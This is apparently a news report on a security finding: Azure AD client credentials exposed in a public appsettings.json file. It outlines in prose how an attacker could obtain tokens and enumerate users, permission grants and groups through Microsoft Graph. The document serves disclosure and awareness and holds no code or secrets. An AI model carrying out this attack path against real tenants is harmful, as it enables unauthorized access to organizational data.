A recent cybersecurity assessment by Resecurity’s HUNTER Team uncovered a high-severity leak when Azure Active Directory (Azure AD) application credentials—specifically the ClientId and ClientSecret—were exposed in a publicly accessible appsettings.json file.
This critical misconfiguration effectively hands attackers the digital keys to the cloud environment, enabling unauthorized token requests against Microsoft’s OAuth 2.0 endpoints and giving adversaries a direct path to Microsoft Graph and Microsoft 365 data.
The high-severity leak means that an attacker who finds the credentials could use them to authenticate against endpoints protected by OAuth 2.0, “effectively masquerading as the trusted application,” according to the post.
“Put simply, exposing appsettings.json with Azure AD secrets is not just a misconfiguration; it’s an attack vector that directly hands adversaries to cloud ” according to the post.
Appsettings.json is the central configuration file that stores important data required for the application to function, and is typically loaded automatically at runtime, according to the post.
To exploit the flaw, an attacker can first use the leaked ClientId and ClientSecret to authenticate against Azure AD using the Client Credentials flow to acquire an access token. Once this is acquired, the attacker then can send a GET request to the Microsoft Graph API to enumerate users within the tenant.
This allows them to collect usernames and emails; build a list for password spraying or phishing; and/or identify naming conventions and internal accounts, according to the post.
The attacker also can query the Microsoft Graph API to enumerate permission grants within the tenant of OAuth2, revealing which applications have been authorized and what scopes they hold.
The acquired token allows an attacker to use group information to identify privilege clusters and business-critical teams, thus exposing organizational structure and identifying key targets for compromise, according to the post.
(Courtesy: www.darkreading.com)
